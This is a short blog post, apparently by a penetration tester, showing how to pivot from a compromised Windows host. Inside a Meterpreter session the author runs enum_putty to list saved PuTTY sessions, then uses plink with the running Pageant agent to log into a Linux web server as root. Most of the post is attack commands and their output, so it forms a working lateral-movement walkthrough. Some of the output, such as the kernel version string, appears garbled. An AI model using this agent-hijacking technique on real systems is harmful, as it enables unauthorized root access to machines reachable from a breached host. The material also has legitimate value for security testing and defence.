Watching Egypt’s talk at DEFCON 20 he mentioned the ability to jump on on a system when pageant (puTTY’s ssh-agent equivalent) is running. So I wanted to figure out the best way to get this going. Here is what I came up with:
meterpreter > run enum_putty [*] Putty Installed for [["Administrator"]] [*] Saved SSH Server Public Keys: [*] rsa2@22:172.16.10.150 [*] Session corp_webserver: [*] Protocol: SSH [*] Hostname: 172.16.10.150 [*] Username: root [*] Public Key: meterpreter >
Awesome, this guy runs as root and we have the IP address. But it doesn’t have any public keys listed. That’s ok because Pageant is running.
meterpreter > shell Process 3364 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Program Files\PuTTY>plink -agent email@example.com plink -agent firstname.lastname@example.org Welcome to Ubuntu 12.04 LTS (GNU/Linux 184.108.40.206-34 i686) No mail. Last login: Tue Aug 28 14:15:18 2012 from 172.16.10.100 email@example.com:~]$ id uid=0(root) gid=0(root) groups=0(root)
w00t! An extra shell for free!!